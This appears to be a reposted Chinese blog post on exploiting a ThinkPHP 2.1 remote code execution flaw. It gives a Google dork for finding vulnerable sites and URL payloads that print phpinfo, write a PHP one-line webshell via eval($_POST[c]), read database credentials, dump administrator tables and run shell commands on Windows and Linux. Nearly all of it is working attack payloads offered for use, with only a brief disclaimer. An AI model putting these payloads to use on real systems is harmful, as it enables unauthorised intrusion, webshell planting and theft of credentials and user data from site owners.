zoukankan      html  css  js  c++  java
  • Thinkphp2.1漏洞利用

    thinkphp2.1版本

    Google语法:

    inurl:index.php intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework }  禁止用在非法用途

    进行测试,输出phpinfo

    index.php/Index/index/name/$%7B@phpinfo%28%29%7D

    输出版本信息:

    index.php/module/action/param1/${@print(THINK_VERSION)}

    写入一句话

    index.php/module/action/param1/${@print(eval($_POST[c]))}

     

     一些其他执行语句:

    1.使用c方法,获取其他数据库 配置相关信息:c(db_name)、c(db_host)、c(db_user)、c(db_pwd)等 

    /index.php/module/action/param1/$%7b@print(c(db_name))%7d

    3.使用d方法或者m方法,查询其他数据库 ,最典型的使用方式var_dump(d(admin)->select()),能够查询出管理员信息,当然,表名需要猜一下,一般是admin,user等

    /index.php/module/action/param1/$%7b@print(var_dump(d(admin)->select()))%7d

    4.利用php在“·”(tab键上面的键,url编码后为%60)之间的内容可以当做命令执行的方式,不管是windows还是linux下,都可以执行cmd或者是shell命令。

    index.php/module/action/param1/$%7b@print(%60dirls%60)%7d  ---------- 在windows下
    
    index.php/module/action/param1/$%7b@print(%60ls%60)%7d -------------在linux下
  • 相关阅读:
    MySQL事物原理及事务隔离级别
    sql中in和exists的原理及使用场景。
    PHP实现多继承
    磁盘inode节点被占满的解决方法
    使用uwsgi和gunicorn部署Django项目
    python自学经验,每天进步一点点
    msyql 5.7安装遇到的坑
    shell 三剑客
    nginx 配置
    websphere 新建profile
  • 原文地址:https://www.cnblogs.com/someone9/p/10186179.html
Copyright © 2011-2022 走看看